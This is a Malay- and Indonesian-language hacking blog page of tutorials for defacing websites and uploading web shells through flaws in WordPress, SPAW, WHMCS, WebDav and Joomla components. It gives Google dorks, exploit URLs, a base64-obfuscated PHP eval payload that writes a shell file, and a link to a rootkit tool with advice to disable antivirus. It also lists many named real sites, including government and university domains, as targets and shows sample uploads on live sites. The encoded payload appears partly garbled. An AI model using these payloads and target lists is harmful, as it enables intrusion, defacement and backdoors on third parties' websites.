Home » Posts filed under TUTORIAL HACK
"Encodable" ~ another Deface and shell upload Vulnerablity
Exploit WordPress uploads
Wordpress Exploit Easy Comment Upload
Title : Wordpress Exploit Easy Comment Upload
Dork : inurl:easy-comment-uploads/upload-form.php
POC : /wp-content/plugins/easy-comment-uploads/upload-form.php
Caranya :
1. Pergi Google masukkan dork ke dalam Search dan Go.
Dork : inurl:easy-comment-uploads/upload-form.php
2. Pilih target.
3. Ada butang choose file tu tekan dan upload file anda.
4. Tidak semua dapat support html/php/asp sebab bug ne sudah fix 12/09/2011.
5. Dapat target untuk upload html kira bertuahlah.
Untuk lihat hasil file upload anda tambah /wp-content/uploads/2011/10/nama_file_anda.extension
Contoh yang saya buat guna file .htm / .txt & .png
http://robbyvillegas.com/wp-content/uploads/2011/10/Muz_c0d3r.htm
http://el-bulli.net/wp-content/uploads/2011/10/Muz_c0d3r.txt
http://onigirifx.com/wp-content/uploads/2011/10/Muz_c0d3r.png
Kalo nak edit website yang saya dah upload file tu guna POC.
Caranya :
1. http://robbyvillegas.com/wp-content/uploads/2011/10/Muz_c0d3r.htm <--tukar URL ke
2. http://robbyvillegas.com/wp-content/plugins/easy-comment-uploads/upload-form.php
3. Kemudian upload file .htm anda...
Enjoy...
Deface Website Dengan Spaw File Manager
Asslam. dan selamat pagi!! .. hari ini admin nk share satu hack... ^_^ .. sempena hari jadi Admin Hari ini.. rase smgt pulk nk wat News pos ... heheheh ok hari ini admin nk tujukan Hack
SPAW FILE MANAGER - FILE UPLOAD VULNERABILITY
Jom Start!!
1. Masukkan salah satu Dork ini di Google search
= inurl:Spaw2/dialogs/
= Inurl:spaw2/uploads/files \
= Index of:/Spaw2/uploads/files
2.Pilih satu website dan masukan exploit dihujung URL... dan tekan enter.
Exploit :/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Contoh: www.[localhost].com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Note : Kotak hitam : pilih Image or Files or Create Folder
Hack WHM with Submit Ticket Exploit
Pada kesempatan ini siinchankeke akan memberikan Tutorial cara Hack WHMCS dengan Menggunakan Metode Submitticket
Sebelum kita masuk ke pembahasan Tutorial Hack WHMCS dengan Menggunakan Metode Submitticket, marilah kita persiapkan dahulu bahan-bahan untuk Hack WHMCS dengan Menggunakan Metode Submitticket
Bahan-bahannya cukuplah simple, hanya membutuhkan sebuah script untuk mengupload shell anda Website WHMCS yang akan di hack dengan menggunakan metode Submitticket
Berikut ini Scriptnya :
Setelah itu mari kita ikuti langkah-langkah Tutorial Hack WHMCS dengan Menggunakan Metode Submitticket, langkahnya sebagai berikut :{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OE{php}eval(base64_decode('wyWnZjbTAgSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSSBQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSSBWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JIFBHSnlQaWM3SUgwTkNuME5DajggIik7ICR2ID0gYmFzZTY0X2RlY29kZSgiSkhZZ1BTQWtTRlJVVUY5RFQwOUxTVVZmVmtGU1Uxc2lkbWx6YVhSeklsMDdEUW9nYVdZb0lDUjJJRDA5SUNJaUtRMEtJSHNrZGlBOUlEQTdEUW9nSkhacGMybDBiM0lnUFNBa1gxTkZVbFpGVWxzaVVrVk5UMVJGWDBGRVJGSWlYVHNOQ2lBa2QyVmlJRDBnSkY5VFJWSldSVkpiSWtoVVZGQmZTRTlUVkNKZE93MEtJQ1JwYm1vZ1BTQWtYMU5GVWxaRlVsc2lVa1ZSVlVWVFZGOVZVa2tpWFRzTkNpQWtkR0Z5WjJWMElEMGdjbUYzZFhKc1pHVmpiMlJsS0NSM1pXSXVKR2x1YWlrN0RRb2dKR0p2WkhrZ1BTQWlVMmhsYkd3Z1YyaHRZM01nUkdrZ09pQWtkR0Z5WjJWMElHbHdJQ1IyYVhOcGRHOXlJanNnUUcxaGFXd29JbmRoYkdGb01UVTVRR2R0WVdsc0xtTnZiU0lzSWlBa2RHRnlaMlYwSWl3Z0lpUmliMlI1SWlrN0RRb2dmU0JsYkhObElIc05DaUFrZGpzTkNpQjlJSE5sZEdOdmIydHBaU2dpZG1semFYUnpJaXdrZGlrNyIpOyAkZm8gPSBmb3BlbigidGVtcGxhdGVzL3gucGhwIiwidyIpOyBmd3JpdGUoJGZvLCRjb2RlLCR2KTs=')) ;{/php})
Pertama-tama kita coba cari website WHMCS yang dapat di Hack WHMCS dengan Menggunakan Metode Submitticket dengan dork dibawah ini :
1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=
intext:Powered by WHMCompleteSolution inurl:submitticket.php*Dork diatas dapat anda kembangkan lagi sesuai keinginan anda
intext:Powered by WHMCompleteSolution inurl:clients/submitticket.php
intext:Powered by WHMCompleteSolution inurl:client/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientsarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:clientarea/submitticket.php
intext:Powered by WHMCompleteSolution inurl:crm/submitticket.php
intext:Powered by WHMCompleteSolution inurl:cp/submitticket.php
intext:Powered by WHMCompleteSolution inurl:manage/submitticket.php
intext:Powered by WHMCompleteSolution inurl:member/submitticket.php
intext:Powered by WHMCompleteSolution inurl:members/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billing/submitticket.php
intext:Powered by WHMCompleteSolution inurl:billings/submitticket.php
intext:Powered by WHMCompleteSolution inurl:support/submitticket.php
intext:Powered by WHMCompleteSolution inurl:help/submitticket.php
intext:Powered by WHMCompleteSolution inurl:secure/submitticket.php
intext:Powered by WHMCompleteSolution inurl:store/submitticket.php
intext:Powered by WHMCompleteSolution inurl:whmcs/submitticket.php
intext:Powered by WHMCompleteSolution inurl:log/submitticket.php
intext:Powered by WHMCompleteSolution inurl:myaccount/submitticket.php
intext:Powered by WHMCompleteSolution inurl:orders/submitticket.php
intext:Powered by WHMCompleteSolution inurl:order/submitticket.php
intext:Powered by WHMCompleteSolution inurl:portal/submitticket.php
intext:Powered by WHMCompleteSolution inurl:mc/submitticket.php
intext:Powered by WHMCompleteSolution inurl:office/submitticket.php
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:com
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:org
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:net
intext:Powered by WHMCompleteSolution inurl:submitticket.php site:info
intext:Powered by WHMCompleteSolution inurl:".*/*/submitticket.php"
intext:Powered by WHMCompleteSolution inurl:".*/submitticket.php"
Setelah anda mendapatkan Website WHMCS yang dapat di Hack dengan Menggunakan Metode Submitticket, anda dapat mengikuti step-stepnya di bawah ini
1. Silahkan anda mencari website WHMCS dengan menggunakan DORK Google diatas
misalkan saja saya mendapatkan website seperti ini
2.Mari kita coba dengan memasukkan Script yang telah saya berikan untuk Hack WHMCS dengan Menggunakan Metode Submitticket diatas tadi pada kolom "Nama","Subject", dan "Isi"
3.Klik Submit dan Coba kita cek hasilnya di http://www.[TargetWhmcsMu].com/[Path]/templates/x.php
*Jika berhasil maka hasilnya akan seperti gambar diatas
4.Setelah Shell terupload maka langkah terakhir adalah mengupload backdoor anda
5.Sekian Tutorial Hack WHMCS dengan Menggunakan Metode Submitticket
Deface With Webdav
Buat file deface yang perlu di upload nanti :
langkah2 :
Contoh Deface :http://graniteliquidators.com/ch.html
1. bukak : http://graniteliquidators.com/ch.html
2. pastu tekan ctrl+u , nanti keluar tab baru ,
3. Copy semua code tersebut ,
4. Bukak notepad , and paste code tadi , korang nak tukar Cyber Hacker CH kepada name korang pon buleh ,
5. dah siap , Pastu Save as belakangnye mesti ade .html contoh : cyberhacker.html
dan save as type nye : All File
6. tinggal nak upload je XP
Assalamualaikum…..entry kali ni aku nk ajar korang cara deface menggunakan WebDav oleh Hmei7.Untuk maklumat korang, Deface menggunakan WebDev ini korang dapat menanam shell.Baiklah…jom mula…
Download Files :
Korang perlu download file2nya terlebih dahulu :
Download : Rootkit
Password : cbf
Download : Shell
note : anda haru tutup antivirus anda.Kalau tidak antivirus akan detect rootkit tu sebagai virus.
Cara-cara Menggunakannya :
1. Buka tool rootkit. Akan keluar macam gambar dibawah:
2.Klik WebDav lalu klik Asp shell maker seperti gambar diatas.Lepas tu akan keluar mcam gambar dibawah:
3.Click setting…akan keluar mcm gambar dibawah:
4. Lepas keluar macam tu.. korang semua rename Hmei7 tu kepada nama ape juga nama yg korang suka. Ingat, tukar Hmei7 tu aje… yg .asp;.txt jangan ubah langsung.
5. Pastu… korang kena Load shell from file. Seperti gambar dibawah:
7. Selepas itu, Click add site.seperti gambar bawah:
8.Letak url yang u all nak target… Pastu Klik Serang!!..
Bila dah serang dia akan keluar macam gambar kat bawah…
Akan keluar tulis : Checking : http://www.apa2.com.Setelah selesai,akan keluar seperti gambar dibawah :
Sekarang copy link shell yg diberi!dan paste di dalam address bar di browser anda dan tekan enter!
some vuln site :
tunjukkan kepakaran korang ,
http://admats.concerts.com/
http://my.smser.eu/
http://www.lawrenceting.com/
http://dike.dpt.go.th/
http://www.elcsfj.gov.cn/
http://documents.co.st-lucie.fl.us/
http://www.ybsds.gov.cn/
http://rsj.xxz.gov.cn/
http://www.xzll.gov.cn/
http://www.xmfg.gov.cn/
http://zzx.wlcbsgs.gov.cn/
http://www.librogondwana.com.ar/
http://www.ingacarrasco.com.ar/
http://www.salsadella.com.ar/
http://www.bgmgroup.cn/
http://ssc.rrp.kr/
http://www.bonweshop.cn/
http://www.entreculturas.pt/
http://www.51lvyo.cn/
http://www.tishineng.cn/
http://lib.zcu.edu.cn/
http://www.r-fashion.com/
http://www.shbhgy.com/
http://xcb.nenu.edu.cn/
http://www.xiajiashan.com/
http://www.aiboshop.com/
http://www.vernicefrescateatro.it/
http://www.scuolamediaserino.it/
http://www.maxvision.it/
http://www.associazionebildung.it/
http://muzquizcoahuila.com/
http://furama-villas.com/
http://jozbdn.com/
http://www.hdwebtv.it/
http://www.denuncio.cl/
http://www.turismoyarte.com/
http://www.innovatech-chile.cl/
http://www.vintagefaucet.net/
http://www.maxtek-go-go.com/
http://www.blusign.it/
http://www.indal2000.it/
http://ced.kmutnb.ac.th/
http://www.seatinterni.it/
http://www.fmfogazzifratelli.it/
http://sverigesridlager.org/
http://svenskahastsportguiden.se/
http://singelguiden.se/
http://ridsportruntsverige.se/
http://modeguide.se/
http://ridleder.se/
http://kattguiden.com/
http://kattannons.se/
http://jackrusselterrier.se/
http://hundannons.se/
http://horseandcountry.eu/
http://hastsemester.se/
http://hastochryttare.se/
http://ridsemester.com/
http://www.telecomyork.com/
http://www.webcampustecnonexo.com/
http://www.zblx.org/
http://www.candledevelopment.com/
http://www.kozi.com.tw/
http://www.cart.com.hk/
http://vendors.csgroupny.com/
http://www.4lunch.com.au/
http://www.druckpunkt.at/
http://www.tsjx.org.cn/
http://counselorlogin.com/
http://www.icandyvisuals.com/
http://dev1.ipsd.org/
http://57157111.com/
http://www.jn14z.jinedu.cn/
http://www.lsysx.jinedu.cn/
http://www.sdcydh.com/
http://www.sddaping.com/
http://www.fengyi668.com/
http://www.ssfjy.com/
http://www.dianfuxj.com/
http://zkhb.homesoft.com.cn/
http://lidu.homesoft.com.cn/
http://www.hhswbg.com/
http://www.xajpg.cn/
http://www.f580.cn/
http://www.cooptionscorp.com/
http://pla.hbu.cn/
http://5151lvyou.com/
http://www.tent-pro.tw/
http://www.mazda-gh.tw/
http://www.wiltrom.com.tw/
http://www.dialect.tw/
http://www.koul.com.tw/
http://www.digguitar.com/
http://hx0579.com/
http://teyoumei.com/
http://5152255.com/
http://km.gmtx.com/
http://tyc.ykjt.cn/
http://caiwu.hkjulong.com/
CREDIT : REAPERZHACKING ( Afif )
JOOMLA COMPONENT COM_SMARTFORMER SHELL UPLOAD VULNERABILITY
Assalamualaikum hari ini aku nak share exploit joomla lagi.Exploit ini korang bole upload shell.Ok jom mula.
1. Google dork :
inurl:"index.php?option=com_smartformer"
2. Pilih salah satu target dah akan keluar contoh mcm dalam gambar di bawah :
Isi maklumat macam dalam gambar.
Lepas tu SUBMIT.
Akan keluar lebih kurang macam gambar di bawah :
Ok kalau keluar mcm ni mksudnya shell korang dah masuk.Tapi kalau tak keluar macam ni contoh nya dia tulis "File rejected","file contain virus", dll maksudnya korang tak boleh upload shell.
3. Untuk tengok hasil :
http://target.com/components/com_smartformer/files/SHELL.php
target.com = ganti dengan url website yg korang dapat SHELL.php tu ganti dengan nama shell korang.
note : ada website yang bole upload tapi bila buka shell tulis not found.tu maksudnya website tu simpan shell tu di directory lain.korang kena cari explore seniri.
SIAP!
Live Demo :
http://www.northendthrift.com/index.php?option=com_smartformer&Itemid=3
Result :
http://www.northendthrift.com/components/com_smartformer/files/hello.html
cc:Reaperz